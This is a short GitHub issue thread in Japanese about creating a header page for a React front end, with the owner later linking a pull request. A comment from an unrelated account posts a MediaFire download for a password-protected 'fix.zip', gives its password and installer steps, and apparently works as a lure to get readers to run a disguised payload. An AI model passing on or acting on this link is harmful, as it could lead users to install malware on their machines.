### ISSUE TITLE
ヘッダーの作成

### ISSUE THREAD

**Issue by railgun-0402** [railgun-0402/React_Spring_Front#2]
ヘッダーページを作成し、index.tsxに記載する。

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by railgun-0402** [comment]
https://github.com/railgun-0402/React_Spring_Front/pull/4
